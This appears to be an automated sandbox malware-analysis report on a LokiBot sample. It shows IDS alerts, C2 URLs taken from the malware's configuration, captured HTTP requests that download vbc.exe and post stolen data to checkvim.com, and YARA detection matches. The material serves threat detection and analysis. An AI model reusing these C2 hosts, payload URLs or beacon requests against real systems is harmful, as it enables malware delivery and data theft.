              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49231 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49231 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49231 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49231
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49232 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49232 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49232 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49232 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49232
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49233 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49233 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49233 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49233 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49233
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49234 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49234 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49234 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49234 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49234
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49235 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49235 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49235 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49235 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49235
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49236 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49236 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49236 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49236 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49236
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49237 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49237 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49237 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49237 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49237
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49238 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49238 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49238 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49238 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49238
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49239 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49239 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49239 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49239 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49239
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49240 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49240 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49240 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49240 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49240
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49241 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49241 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49241 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49241 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49241
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49242 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49242 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49242 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49242 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49242
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49243 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49243 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49243 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49243 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49243
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49244 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49244 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49244 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49244 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49244
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49245 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49245 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49245 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49245 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49245
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49246 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49246 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49246 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49246 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49246
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49247 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49247 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49247 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49247 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49247
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractor, URLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractor, URLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractor, URLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractor, URLs: http://alphastand.top/alien/fre.php
              Source: Malware configuration extractor, URLs: http://checkvim.com/ga14/fre.php
              Source: Joe Sandbox View, ASN Name: PINDC-ASRU PINDC-ASRU
              Source: Joe Sandbox View, ASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK
              Source: global traffic, HTTP traffic detected:
                  HTTP/1.1 200 OK
                  Date: Tue, 28 Sep 2021 04:50:21 GMT
                  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10
                  Last-Modified: Mon, 27 Sep 2021 22:15:04 GMT
                  ETag: "33600-5cd016dd19714"
                  Accept-Ranges: bytes
                  Content-Length: 210432
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/x-msdownload
              Source: global traffic, HTTP traffic detected:
                  GET /wdc/vbc.exe HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: 103.155.83.184
                  Connection: Keep-Alive
              Source: global traffic, HTTP traffic detected:
                  POST /ga14/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: checkvim.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 66369A18
                  Content-Length: 176
                  Connection: close
              Source: global traffic, HTTP traffic detected:
                  POST /ga14/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: checkvim.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 66369A18
                  Content-Length: 149
                  Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: unknown, TCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: vbc.exe, String found in binary or memory: http://checkvim.com/ga14/fre.php
              Source: vbc.exe, 00000004.00000002.664629094.0000000002700000.00000002.00020000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: vbc.exe, 00000004.00000002.664629094.0000000002700000.00000002.00020000.sdmp, String found in binary or memory: http://www.%s.comPA
              Source: 89D14D5A.emf.0.dr, String found in binary or memory: http://www.day.com/dam/1.0
              Source: vbc.exe, vbc.exe, 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, String found in binary or memory: http://www.ibsensoftware.com/
              Source: unknown, HTTP traffic detected: POST /ga14/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: checkvim.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 66369A18 Content-Length: 176 Connection: close
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89D14D5A.emf
              Source: unknown, DNS traffic detected: queries for: checkvim.com
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_00404ED4 recv,
              Source: global traffic, HTTP traffic detected: GET /wdc/vbc.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 103.155.83.184 Connection: Keep-Alive

              System Summary:

              Malicious sample detected (through community Yara rule)
              Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
              Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
              Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
              Source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
